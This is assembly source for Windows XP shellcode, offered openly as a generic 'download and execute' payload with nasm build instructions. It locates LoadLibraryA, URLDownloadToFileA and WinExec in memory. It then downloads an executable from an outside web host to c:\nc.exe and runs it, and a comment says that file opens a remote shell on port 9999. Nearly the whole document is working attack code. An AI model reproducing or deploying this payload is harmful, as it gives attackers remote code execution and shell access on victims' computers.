; Nice theorhetically generic url download and execute ; shellcode for Windows XP. ; ; Heck, atleast it saves you using tftp! ; ; [email protected] ; ; nasmw -s -fbin -o download.s download.asm bits 32 start: jmp short avoidnastynulls continue: pop edi ; edi = 'urlmon.dll' mov esi, edi mov al, 0ffh repne scasb inc byte [edi-01h] ; edi = string of url mov ebx, edi mov al, 0ffh repne scasb inc byte [edi-01h] ; edi = path of download mov edx, edi repne scasb inc byte [edi-01h] push edx push ebx push edx push esi mov ebx, 0c25b5effh mov ecx, 0deadc0deh mov edi, 77e60101h trawlmem: inc edi mov al, 0ffh repne scasb jmp short checkbytes nop checkbytes: dec edi push dword [edi] pop esi cmp ebx, esi je short gotcha jmp short trawlmem jmp short pastpoint avoidnastynulls: jmp short data pastpoint: gotcha: lea eax, [edi-2eh] ; get to start of loadlibrarya function call eax ; call loadlibrarya pop edx pop ebx push edx xor ecx, ecx push ecx push ecx push edx ; path of download push ebx ; url of download push ecx mov ebx, 8d8d5602h mov ecx, 0badc0dedh mov edi, eax ; eax = base of urlmon.dll trawlmem2: inc edi mov al, 002h repne scasb jmp short checkbytes2 nop checkbytes2: dec edi push dword [edi] pop esi cmp ebx, esi je short gotcha2 jmp short trawlmem2 gotcha2: lea eax, [edi-1bh] ; get to start of urldownloadtofilea function call eax ; call urldownloadtofilea pop edx xor ecx, ecx ;inc ecx push ecx push edx mov ebx, 0c458b66h mov ecx, 1337f00dh mov edi, 77e60101h trawlmem3: inc edi mov al, 066h repne scasb jmp short checkbytes3 nop checkbytes3: dec edi push dword [edi] pop esi cmp ebx, esi je short gotcha3 jmp short trawlmem3 gotcha3: lea eax, [edi-16h] ; get to start of winexec function call eax ; call winexec mov ecx, 0deadc0deh infloop: ; infinite loop; no crash when done inc ecx cmp ecx, 0badc0dedh loopnz infloop ; if this slows you down too much, remove it! int 3h data: call continue db 'URLMON.DLL', 0ffh db 'http://www.elitehaven.net/ncat.exe', 0ffh ; the file at this address spawns remote shell on port 9999 db 'c:\nc.exe', 0ffh